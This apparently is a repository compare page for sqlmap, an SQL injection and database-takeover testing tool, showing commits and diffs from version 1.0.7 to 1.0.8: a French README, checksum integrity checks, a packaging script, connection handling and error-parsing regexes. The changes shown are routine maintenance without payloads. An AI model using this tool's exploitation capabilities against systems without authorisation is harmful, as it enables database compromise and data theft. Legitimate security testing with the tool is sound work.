PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-06 20:51:31 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:1.0.7
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9
..
compare: PenTest:1.0.8
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9

66 Commits
1.0.7 ... 1.0.8

Author SHA1 Message Date
Miroslav Stampar
4af65f6c41 Preparing for #1250 2016-08-02 00:25:01 +02:00
Miroslav Stampar
acfe788c95 Preparing for #1250 2016-08-02 00:17:59 +02:00
Miroslav Stampar
5ccb73a1ee Minor patch for Python3 check 2016-07-29 15:30:59 +02:00
Miroslav Stampar
6ac5b6b759 Minor refactoring 2016-07-28 17:04:15 +02:00
Miroslav Stampar
d82f20abc4 Fixes #2068 2016-07-28 17:02:27 +02:00
Miroslav Stampar
10eafa35fd Adding CloudFlare CAPTCHA warning 2016-07-23 23:02:15 +02:00
Miroslav Stampar
9105f259cd Fixes #2060 (ParseError has been added in Python 2.7) 2016-07-23 15:27:25 +02:00
Miroslav Stampar
7cca56edfa Fixes #2052 2016-07-21 09:38:52 +02:00
Miroslav Stampar
e21d751834 Fixes #2049 2016-07-20 20:04:44 +02:00
Miroslav Stampar
ebb73b71fa Fixes #2045 2016-07-20 16:49:27 +02:00
Miroslav Stampar
1ca633ae64 Fixes #2031 2016-07-17 23:30:40 +02:00
Miroslav Stampar
3e22cbfed7 Minor update 2016-07-17 00:34:14 +02:00
Miroslav Stampar
c7f615f707 Renaming payload files (consistency with the rest of the project) 2016-07-17 00:21:16 +02:00
Miroslav Stampar
b83ee92cd1 Minor modification 2016-07-17 00:09:09 +02:00
Miroslav Stampar
571d669a09 Minor modification 2016-07-17 00:07:58 +02:00
Miroslav Stampar
e485531b71 Adding integrity checks in case of unhandled exceptions 2016-07-17 00:04:30 +02:00
Miroslav Stampar
7427b554e3 Adding support for integrity checks 2016-07-16 23:25:13 +02:00
Miroslav Stampar
1a818ceccd Adding error message regarding #2030 2016-07-16 22:47:16 +02:00
Miroslav Stampar
7fea8d608e Fixes #2028 2016-07-16 22:42:15 +02:00
Miroslav Stampar
1e6191e3b1 Fixes #2026 2016-07-16 15:51:09 +02:00
Miroslav Stampar
c10b2825d7 Patch for --os-shell against Windows/MySQL where resulting \r caused trouble 2016-07-15 11:56:51 +02:00
Miroslav Stampar
c200b2cb19 Another fix (related to the last commit) 2016-07-15 11:45:59 +02:00
Miroslav Stampar
071f4c8a2b Bug fix (reported privately) - better parsing of file paths (especially for Windows cases) 2016-07-15 11:13:47 +02:00
Miroslav Stampar
5097a2c79e Less timeout error messages (because of server dropping of non-active connections) 2016-07-15 00:33:33 +02:00
Miroslav Stampar
bce9db1af5 Adding support for --columns too (Issue #2025) 2016-07-15 00:10:41 +02:00
Miroslav Stampar
ca67456dbe Removing a debugging leftover (Issue #2025) 2016-07-14 23:39:44 +02:00
Miroslav Stampar
6df4d73b09 Implementation for an Issue #2025 2016-07-14 23:18:28 +02:00
Miroslav Stampar
2aaa486f7a Minor code style update 2016-07-13 14:09:33 +02:00
Miroslav Stampar
47ba7d4705 Minor update 2016-07-07 10:37:00 +02:00
Miroslav Stampar
6a8bfd5fd8 Update for an Issue #2011 2016-07-07 09:20:44 +02:00
Miroslav Stampar
1df94747e1 Merge pull request #2011 from guinslym/fr-FR 
Added a French translation fr-Fr
 2016-07-07 09:17:42 +02:00
Guinsly Mondesir
4092c701fe french translation 2016-07-06 21:05:38 -04:00
Guinsly Mondesir
4939bd49b0 french translation 2016-07-06 21:01:48 -04:00
Guinsly Mondesir
c6fb3d35d8 french translation 2016-07-06 21:00:13 -04:00
Guinsly Mondesir
aad0bd8705 french translation 2016-07-06 20:58:29 -04:00
Guinsly Mondesir
b69f635a3f french translation 2016-07-06 20:56:36 -04:00
Guinsly Mondesir
eeae696b1b french translation 2016-07-06 20:54:16 -04:00
Guinsly Mondesir
e1c8bc0e01 french translation 2016-07-06 20:53:48 -04:00
Guinsly Mondesir
4b0acee585 french translation 2016-07-06 20:52:03 -04:00
Guinsly Mondesir
d74612eb4c french translation 2016-07-06 20:50:31 -04:00
Guinsly Mondesir
88c33974ac french translation 2016-07-06 20:48:57 -04:00
Guinsly Mondesir
e5d7bfe453 french translation 2016-07-06 20:47:35 -04:00
Guinsly Mondesir
99d23237b4 french translation 2016-07-06 20:44:56 -04:00
Guinsly Mondesir
08d750197c french translation 2016-07-06 20:44:26 -04:00
Guinsly Mondesir
d35bdf6eaa french translation 2016-07-06 20:43:31 -04:00
Guinsly Mondesir
d332e00eb0 french translation 2016-07-06 20:42:55 -04:00
Guinsly Mondesir
9d5499597f french translation 2016-07-06 20:42:24 -04:00
Guinsly Mondesir
c0f8bbbc72 french translation 2016-07-06 20:41:39 -04:00
Guinsly Mondesir
1684d60782 french translation version 2.0 2016-07-06 20:40:25 -04:00
Guinsly Mondesir
af6a977c9a moving the French translation to another folder 2016-07-06 19:45:50 -04:00
Guinsly Mondesir
f20263f235 creating a base file for fr tranlsation 2016-07-06 19:44:37 -04:00
Miroslav Stampar
2e42afea6f Update of sucury WAF script 2016-07-06 23:43:21 +02:00
Miroslav Stampar
292a28131d Minor updates 2016-07-06 23:43:10 +02:00
Miroslav Stampar
2e775fbb75 (e.g.) ASPx MsSQL Chinese exception messages don't start with 'Exception: string' 2016-07-06 14:06:18 +02:00
Miroslav Stampar
e1d7641b8a Good for different generic OleDB-alike connectors 2016-07-06 13:48:35 +02:00
Miroslav Stampar
6b0951d1ee Switching default Tor type to SOCKS5 (various bundles are discontinued) 2016-07-06 13:30:46 +02:00
Miroslav Stampar
db1fc621b5 Update for SonicWALL WAF script; lesser false positives with ModSecurity WAF script 2016-07-06 13:19:51 +02:00
Miroslav Stampar
9351756c36 Minor update of format exception strings 2016-07-05 16:02:34 +02:00
Miroslav Stampar
63b645c64c Removing a debugging leftover 2016-07-05 09:32:30 +02:00
Miroslav Stampar
7ad49f4185 Less problematic regexes for MsSQL errors 2016-07-05 09:32:08 +02:00
Miroslav Stampar
d9315830f9 Less problematic regex for MsSQL errors 2016-07-05 09:20:04 +02:00
Miroslav Stampar
2e2c62b6a7 More error regexes 2016-07-04 17:24:17 +02:00
Miroslav Stampar
53289b0234 Some more Informix error regexes 2016-07-04 10:03:36 +02:00
Miroslav Stampar
dd082ef79d Minor update (new error regex for Informix) 2016-07-04 09:49:18 +02:00
Miroslav Stampar
2c968f9a35 Closes #2007 2016-07-04 09:12:30 +02:00
Miroslav Stampar
74d0315fef Update related to the last commit 2016-07-03 02:14:23 +02:00
34 changed files with 918 additions and 100 deletions
Expand all files Collapse all files

3
.gitattributes vendored
View File

@@ -1,5 +1,6 @@
*.py text eol=lf
*.conf text eol=lf
*.md5 text eol=lf
*.py text eol=lf
*_ binary
*.dll binary

1
README.md
View File

@@ -57,6 +57,7 @@ Translations
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)

52
doc/translations/README-fr-FR.md Normal file
View File

@@ -0,0 +1,52 @@
# sqlmap
[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
----
![Les Captures d'écran](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) démontrent des fonctionnalités de __sqlmap__.
Installation
----
Vous pouvez télécharger le plus récent fichier tarball en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger le plus récent archive zip [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).
De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap):
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/)
Usage
----
Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez:
python sqlmap.py -h
Pour afficher une liste complète des options et des commutateurs (switches), tapez:
python sqlmap.py -hh
Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki).
Liens
----
* Page d'acceuil: http://sqlmap.org
* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

17
extra/shutils/precommit-hook
View File

@@ -1,20 +1,27 @@
#!/bin/bash
PROJECT="../../"
SETTINGS="../../lib/core/settings.py"
CHECKSUM="../../txt/checksum.md5"
declare -x SCRIPTPATH="${0}"
FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT
SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
CHECKSUM_FULLPATH=${SCRIPTPATH%/*}/$CHECKSUM
if [ -f $FULLPATH ]
truncate -s 0 "$CHECKSUM_FULLPATH"
cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
if [ -f $SETTINGS_FULLPATH ]
then
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"');
declare -a LINE;
INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
if [ -n "$INCREMENTED" ]
then
sed "s/${LINE}/${INCREMENTED}/" $FULLPATH > $FULLPATH.tmp && mv $FULLPATH.tmp $FULLPATH
echo "Updated ${INCREMENTED} in ${FULLPATH}";
sed "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH > $SETTINGS_FULLPATH.tmp && mv $SETTINGS_FULLPATH.tmp $SETTINGS_FULLPATH
echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}";
else
echo "Something went wrong in VERSION increment"
exit 1

56
extra/shutils/pypi.sh Normal file
View File

@@ -0,0 +1,56 @@
#!/bin/bash
VERSION=1.0.8
TMP_DIR=/tmp/pypi
mkdir $TMP_DIR
cd $TMP_DIR
cat > $TMP_DIR/setup.py << EOF
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from setuptools import setup, find_packages
setup(
name='sqlmap',
version='$VERSION',
description="Automatic SQL injection and database takeover tool",
author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar',
author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',
url='https://sqlmap.org',
download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
license='GPLv2',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
entry_points={
'console_scripts': [
'sqlmap = sqlmap.sqlmap:main',
],
},
)
EOF
wget "https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip" -O sqlmap.zip
unzip sqlmap.zip
rm sqlmap.zip
mv "sqlmap-$VERSION" sqlmap
cat > sqlmap/__init__.py << EOF
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
EOF
for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done
python setup.py sdist
python setup.py sdist upload
rm -rf $TMP_DIR

2
lib/core/agent.py
View File

@@ -120,7 +120,7 @@ class Agent(object):
elif place == PLACE.CUSTOM_HEADER:
paramString = origValue
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
origValue = origValue[origValue.index(',') + 1:]
origValue = origValue[origValue.find(',') + 1:]
match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
if match:
origValue = match.group("value")

45
lib/core/common.py
View File

@@ -695,8 +695,6 @@ def paramToDict(place, parameters=None):
def getManualDirectories():
directories = None
pagePath = directoryPath(conf.path)
defaultDocRoot = DEFAULT_DOC_ROOTS.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX])
if kb.absFilePaths:
@@ -714,18 +712,18 @@ def getManualDirectories():
windowsDriveLetter, absFilePath = absFilePath[:2], absFilePath[2:]
absFilePath = ntToPosixSlashes(posixToNtSlashes(absFilePath))
if any("/%s/" % _ in absFilePath for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES):
for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES:
_ = "/%s/" % _
for _ in list(GENERIC_DOC_ROOT_DIRECTORY_NAMES) + [conf.hostname]:
_ = "/%s/" % _
if _ in absFilePath:
directories = "%s%s" % (absFilePath.split(_)[0], _)
break
if _ in absFilePath:
directories = "%s%s" % (absFilePath.split(_)[0], _)
break
if pagePath and pagePath in absFilePath:
directories = absFilePath.split(pagePath)[0]
if windowsDriveLetter:
directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories))
if not directories and conf.path.strip('/') and conf.path in absFilePath:
directories = absFilePath.split(conf.path)[0]
if directories and windowsDriveLetter:
directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories))
directories = normalizePath(directories)
@@ -1182,11 +1180,13 @@ def cleanQuery(query):
return retVal
def setPaths():
def setPaths(rootPath):
"""
Sets absolute paths for project directories and files
"""
paths.SQLMAP_ROOT_PATH = rootPath
# sqlmap paths
paths.SQLMAP_EXTRAS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "extra")
paths.SQLMAP_PROCS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "procs")
@@ -1209,6 +1209,7 @@ def setPaths():
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
paths.GITHUB_HISTORY = os.path.join(_, "github.hst")
paths.CHECKSUM_MD5 = os.path.join(paths.SQLMAP_TXT_PATH, "checksum.md5")
paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
paths.COMMON_OUTPUTS = os.path.join(paths.SQLMAP_TXT_PATH, 'common-outputs.txt')
@@ -3079,6 +3080,24 @@ def decodeIntToUnicode(value):
return retVal
def checkIntegrity():
"""
Checks integrity of code files during the unhandled exceptions
"""
logger.debug("running code integrity check")
retVal = True
for checksum, _ in (re.split(r'\s+', _) for _ in getFileItems(paths.CHECKSUM_MD5)):
path = os.path.normpath(os.path.join(paths.SQLMAP_ROOT_PATH, _))
if not os.path.isfile(path):
logger.error("missing file detected '%s'" % path)
retVal = False
elif hashlib.md5(open(path, 'rb').read()).hexdigest() != checksum:
logger.error("wrong checksum of file '%s' detected" % path)
retVal = False
return retVal
def unhandledExceptionMessage():
"""
Returns detailed message about occurred unhandled exception

2
lib/core/defaults.py
View File

@@ -21,7 +21,7 @@ _defaults = {
"risk": 1,
"dumpFormat": "CSV",
"tech": "BEUSTQ",
"torType": "HTTP",
"torType": "SOCKS5",
}
defaults = AttribDict(_defaults)

8
lib/core/dump.py
View File

@@ -119,9 +119,15 @@ class Dump(object):
elif data is not None:
_ = getUnicode(data)
if _ and _[-1] == '\n':
if _.endswith("\r\n"):
_ = _[:-2]
elif _.endswith("\n"):
_ = _[:-1]
if _.strip(' '):
_ = _.strip(' ')
if "\n" in _:
self._write("%s:\n---\n%s\n---" % (header, _))
else:

29
lib/core/option.py
View File

@@ -120,6 +120,7 @@ from lib.core.settings import MAX_CONNECT_RETRIES
from lib.core.settings import MAX_NUMBER_OF_THREADS
from lib.core.settings import NULL
from lib.core.settings import PARAMETER_SPLITTING_REGEX
from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT
from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
from lib.core.settings import SITE
from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE
@@ -1039,7 +1040,7 @@ def _setSocketPreConnect():
s = socket.socket(family, type, proto)
s._connect(address)
with kb.locks.socket:
socket._ready[key].append(s._sock)
socket._ready[key].append((s._sock, time.time()))
except KeyboardInterrupt:
break
except:
@@ -1054,9 +1055,17 @@ def _setSocketPreConnect():
with kb.locks.socket:
if key not in socket._ready:
socket._ready[key] = []
if len(socket._ready[key]) > 0:
self._sock = socket._ready[key].pop(0)
found = True
while len(socket._ready[key]) > 0:
candidate, created = socket._ready[key].pop(0)
if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT:
self._sock = candidate
found = True
break
else:
try:
candidate.close()
except socket.error:
pass
if not found:
self._connect(address)
@@ -1722,7 +1731,7 @@ def _cleanupOptions():
if conf.outputDir:
paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir))
setPaths()
setPaths(paths.SQLMAP_ROOT_PATH)
if conf.string:
try:
@@ -1858,6 +1867,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.dnsMode = False
kb.dnsTest = None
kb.docRoot = None
kb.dumpColumns = None
kb.dumpTable = None
kb.dumpKeyboardInterrupt = False
kb.dynamicMarkings = []
@@ -1941,6 +1951,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.responseTimeMode = None
kb.responseTimePayload = None
kb.resumeValues = True
kb.rowXmlMode = False
kb.safeCharEncode = False
kb.safeReq = AttribDict()
kb.singleLogFlags = set()
@@ -2183,6 +2194,8 @@ def _mergeOptions(inputOptions, overrideOptions):
if inputOptions.pickledOptions:
try:
inputOptions = base64unpickle(inputOptions.pickledOptions)
if type(inputOptions) == dict:
inputOptions = AttribDict(inputOptions)
_normalizeOptions(inputOptions)
except Exception, ex:
errMsg = "provided invalid value '%s' for option '--pickled-options'" % inputOptions.pickledOptions
@@ -2280,6 +2293,7 @@ def _setTorHttpProxySettings():
infoMsg = "setting Tor HTTP proxy settings"
logger.info(infoMsg)
s = None
found = None
for port in (DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)):
@@ -2291,12 +2305,13 @@ def _setTorHttpProxySettings():
except socket.error:
pass
s.close()
if s:
s.close()
if found:
conf.proxy = "http://%s:%d" % (LOCALHOST, found)
else:
errMsg = "can't establish connection with the Tor proxy. "
errMsg = "can't establish connection with the Tor HTTP proxy. "
errMsg += "Please make sure that you have Vidalia, Privoxy or "
errMsg += "Polipo bundle installed for you to be able to "
errMsg += "successfully use switch '--tor' "

16
lib/core/settings.py
View File

@@ -19,7 +19,7 @@ from lib.core.enums import OS
from lib.core.revision import getRevisionNumber
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.0.7.0"
VERSION = "1.0.8.2"
REVISION = getRevisionNumber()
STABLE = VERSION.count('.') <= 2
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
@@ -81,6 +81,9 @@ PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
# Regular expression used for recognition of generic maximum connection messages
MAX_CONNECTIONS_REGEX = r"max.+connections"
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
PRECONNECT_CANDIDATE_TIMEOUT = 10
# Regular expression used for extracting results from Google search
GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&amp;cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
@@ -288,7 +291,7 @@ BLANK = "<blank>"
CURRENT_DB = "CD"
# Regular expressions used for finding file paths in error messages
FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w.\\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P<result>[^<>]+?) on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
# Regular expressions used for parsing error messages (--parse-errors)
ERROR_PARSING_REGEXES = (
@@ -540,7 +543,7 @@ HASHDB_FLUSH_RETRIES = 3
HASHDB_END_TRANSACTION_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
HASHDB_MILESTONE_VALUE = "pGBhWXgbtJ" # import random, string; print "".join(random.sample(string.ascii_letters, 10))
HASHDB_MILESTONE_VALUE = "baFJusZrel" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
# Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -600,7 +603,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
CHECK_ZERO_COLUMNS_THRESHOLD = 10
# Boldify all logger messages containing these "patterns"
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved")
